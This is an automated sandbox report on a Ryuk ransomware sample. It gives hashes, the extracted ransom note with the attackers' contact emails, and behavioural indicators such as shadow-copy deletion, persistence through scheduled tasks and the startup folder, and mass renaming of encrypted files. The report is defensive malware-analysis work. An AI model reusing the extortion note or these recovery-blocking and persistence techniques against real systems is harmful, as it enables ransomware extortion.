ryuk | 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

Analysis

max time kernel
147s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
09-03-2023 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ryuk86.bin.exe
Size

767KB
MD5

d2e194259106bca3b42dc8690d340b59
SHA1

edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256

788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512

4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13
SSDEEP

12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Vulcanteam@CYBERFEAR.COM or vulcanteam@inboxhub.net You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

Vulcanteam@CYBERFEAR.COM

vulcanteam@inboxhub.net

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation cmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1732 icacls.exe

pid	process
1732	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Ryuk86.bin.exe

description	ioc	process
File opened (read-only)	\??\G:	Ryuk86.bin.exe
File opened (read-only)	\??\H:	Ryuk86.bin.exe
File opened (read-only)	\??\B:	Ryuk86.bin.exe
File opened (read-only)	\??\P:	Ryuk86.bin.exe
File opened (read-only)	\??\A:	Ryuk86.bin.exe
File opened (read-only)	\??\U:	Ryuk86.bin.exe
File opened (read-only)	\??\W:	Ryuk86.bin.exe
File opened (read-only)	\??\Z:	Ryuk86.bin.exe
File opened (read-only)	\??\I:	Ryuk86.bin.exe
File opened (read-only)	\??\N:	Ryuk86.bin.exe
File opened (read-only)	\??\O:	Ryuk86.bin.exe
File opened (read-only)	\??\S:	Ryuk86.bin.exe
File opened (read-only)	\??\V:	Ryuk86.bin.exe
File opened (read-only)	\??\R:	Ryuk86.bin.exe
File opened (read-only)	\??\E:	Ryuk86.bin.exe
File opened (read-only)	\??\F:	Ryuk86.bin.exe
File opened (read-only)	\??\J:	Ryuk86.bin.exe
File opened (read-only)	\??\K:	Ryuk86.bin.exe
File opened (read-only)	\??\L:	Ryuk86.bin.exe
File opened (read-only)	\??\M:	Ryuk86.bin.exe
File opened (read-only)	\??\Q:	Ryuk86.bin.exe
File opened (read-only)	\??\T:	Ryuk86.bin.exe
File opened (read-only)	\??\X:	Ryuk86.bin.exe
File opened (read-only)	\??\Y:	Ryuk86.bin.exe

Drops file in Program Files directory 64 IoCs

Processes:

Ryuk86.bin.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo_2x.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\ir.idl.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL048.XML.[Vulcanteam@CYBERFEAR.COM].RYKCRYPT	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ul-oob.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sr-Latn-RS.pak.DATA.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main.css.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ko_get.svg.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-140.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\comment.svg.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main-selector.css.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-text.xml.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-pl.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfont.properties.ja.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_removeme-default_18.svg.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\forms_poster.jpg.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\THMBNAIL.PNG.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee90.tlb.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xsl.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\plugin.js.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BKANT.TTF.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\THMBNAIL.PNG.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\LICENSE.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforsignature_18.svg.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELM.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_thumbnailview_18.svg.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\manifest.json.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Trial-ppd.xrm-ms.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\example_icons2x.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png.[Vulcanteam@CYBERFEAR.COM].RYK	Ryuk86.bin.exe

Drops file in Windows directory 2 IoCs

Processes:

Ryuk86.bin.exe

description ioc process

File created C:\Windows\RyukReadMe.txt Ryuk86.bin.exe
File created C:\Windows\hrmlog1 Ryuk86.bin.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4576 sc.exe
924 sc.exe
4844 sc.exe
3888 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3024 schtasks.exe
3776 schtasks.exe
224 schtasks.exe
664 schtasks.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

780 taskkill.exe
1772 taskkill.exe
4544 taskkill.exe
4852 taskkill.exe
1836 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings cmd.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1424 NOTEPAD.EXE
Runs net.exe

description	ioc	process
File created	C:\Windows\RyukReadMe.txt	Ryuk86.bin.exe
File created	C:\Windows\hrmlog1	Ryuk86.bin.exe

pid	process
4576	sc.exe
924	sc.exe
4844	sc.exe
3888	sc.exe

pid	process
3024	schtasks.exe
3776	schtasks.exe
224	schtasks.exe
664	schtasks.exe

pid	process
780	taskkill.exe
1772	taskkill.exe
4544	taskkill.exe
4852	taskkill.exe
1836	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	cmd.exe

pid	process
1424	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Ryuk86.bin.exe

pid	process
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe
4244	Ryuk86.bin.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

Processes:

taskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	780	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3536	WMIC.exe
Token: SeSecurityPrivilege	3536	WMIC.exe
Token: SeTakeOwnershipPrivilege	3536	WMIC.exe
Token: SeLoadDriverPrivilege	3536	WMIC.exe
Token: SeSystemProfilePrivilege	3536	WMIC.exe
Token: SeSystemtimePrivilege	3536	WMIC.exe
Token: SeProfSingleProcessPrivilege	3536	WMIC.exe
Token: SeIncBasePriorityPrivilege	3536	WMIC.exe
Token: SeCreatePagefilePrivilege	3536	WMIC.exe
Token: SeBackupPrivilege	3536	WMIC.exe
Token: SeRestorePrivilege	3536	WMIC.exe
Token: SeShutdownPrivilege	3536	WMIC.exe
Token: SeDebugPrivilege	3536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3536	WMIC.exe
Token: SeRemoteShutdownPrivilege	3536	WMIC.exe
Token: SeUndockPrivilege	3536	WMIC.exe
Token: SeManageVolumePrivilege	3536	WMIC.exe
Token: 33	3536	WMIC.exe
Token: 34	3536	WMIC.exe
Token: 35	3536	WMIC.exe
Token: 36	3536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3536	WMIC.exe
Token: SeSecurityPrivilege	3536	WMIC.exe
Token: SeTakeOwnershipPrivilege	3536	WMIC.exe
Token: SeLoadDriverPrivilege	3536	WMIC.exe
Token: SeSystemProfilePrivilege	3536	WMIC.exe
Token: SeSystemtimePrivilege	3536	WMIC.exe
Token: SeProfSingleProcessPrivilege	3536	WMIC.exe
Token: SeIncBasePriorityPrivilege	3536	WMIC.exe
Token: SeCreatePagefilePrivilege	3536	WMIC.exe
Token: SeBackupPrivilege	3536	WMIC.exe
Token: SeRestorePrivilege	3536	WMIC.exe
Token: SeShutdownPrivilege	3536	WMIC.exe
Token: SeDebugPrivilege	3536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3536	WMIC.exe
Token: SeRemoteShutdownPrivilege	3536	WMIC.exe
Token: SeUndockPrivilege	3536	WMIC.exe
Token: SeManageVolumePrivilege	3536	WMIC.exe
Token: 33	3536	WMIC.exe
Token: 34	3536	WMIC.exe
Token: 35	3536	WMIC.exe
Token: 36	3536	WMIC.exe
Token: SeBackupPrivilege	2644	vssvc.exe
Token: SeRestorePrivilege	2644	vssvc.exe
Token: SeAuditPrivilege	2644	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Ryuk86.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4244 wrote to memory of 364	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 364	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 364	4244	Ryuk86.bin.exe	cmd.exe
PID 364 wrote to memory of 664	364	cmd.exe	schtasks.exe
PID 364 wrote to memory of 664	364	cmd.exe	schtasks.exe
PID 364 wrote to memory of 664	364	cmd.exe	schtasks.exe
PID 4244 wrote to memory of 4156	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 4156	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 4156	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 2308	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 2308	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 2308	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 5080	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 5080	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 5080	4244	Ryuk86.bin.exe	cmd.exe
PID 5080 wrote to memory of 3024	5080	cmd.exe	schtasks.exe
PID 5080 wrote to memory of 3024	5080	cmd.exe	schtasks.exe
PID 5080 wrote to memory of 3024	5080	cmd.exe	schtasks.exe
PID 4244 wrote to memory of 1072	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 1072	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 1072	4244	Ryuk86.bin.exe	cmd.exe
PID 1072 wrote to memory of 4008	1072	cmd.exe	attrib.exe
PID 1072 wrote to memory of 4008	1072	cmd.exe	attrib.exe
PID 1072 wrote to memory of 4008	1072	cmd.exe	attrib.exe
PID 4244 wrote to memory of 3976	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 3976	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 3976	4244	Ryuk86.bin.exe	cmd.exe
PID 3976 wrote to memory of 3776	3976	cmd.exe	schtasks.exe
PID 3976 wrote to memory of 3776	3976	cmd.exe	schtasks.exe
PID 3976 wrote to memory of 3776	3976	cmd.exe	schtasks.exe
PID 4244 wrote to memory of 220	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 220	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 220	4244	Ryuk86.bin.exe	cmd.exe
PID 220 wrote to memory of 224	220	cmd.exe	schtasks.exe
PID 220 wrote to memory of 224	220	cmd.exe	schtasks.exe
PID 220 wrote to memory of 224	220	cmd.exe	schtasks.exe
PID 4244 wrote to memory of 4308	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 4308	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 4308	4244	Ryuk86.bin.exe	cmd.exe
PID 4308 wrote to memory of 3484	4308	cmd.exe	attrib.exe
PID 4308 wrote to memory of 3484	4308	cmd.exe	attrib.exe
PID 4308 wrote to memory of 3484	4308	cmd.exe	attrib.exe
PID 4244 wrote to memory of 4500	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 4500	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 4500	4244	Ryuk86.bin.exe	cmd.exe
PID 4500 wrote to memory of 4736	4500	cmd.exe	attrib.exe
PID 4500 wrote to memory of 4736	4500	cmd.exe	attrib.exe
PID 4500 wrote to memory of 4736	4500	cmd.exe	attrib.exe
PID 4244 wrote to memory of 1728	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 1728	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 1728	4244	Ryuk86.bin.exe	cmd.exe
PID 1728 wrote to memory of 4420	1728	cmd.exe	cmd.exe
PID 1728 wrote to memory of 4420	1728	cmd.exe	cmd.exe
PID 1728 wrote to memory of 4420	1728	cmd.exe	cmd.exe
PID 4244 wrote to memory of 4248	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 4248	4244	Ryuk86.bin.exe	cmd.exe
PID 4244 wrote to memory of 4248	4244	Ryuk86.bin.exe	cmd.exe
PID 4248 wrote to memory of 4212	4248	cmd.exe	cmd.exe
PID 4248 wrote to memory of 4212	4248	cmd.exe	cmd.exe
PID 4248 wrote to memory of 4212	4248	cmd.exe	cmd.exe
PID 4248 wrote to memory of 780	4248	cmd.exe	taskkill.exe
PID 4248 wrote to memory of 780	4248	cmd.exe	taskkill.exe
PID 4248 wrote to memory of 780	4248	cmd.exe	taskkill.exe
PID 4244 wrote to memory of 872	4244	Ryuk86.bin.exe	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

4524 attrib.exe
4008 attrib.exe
3484 attrib.exe
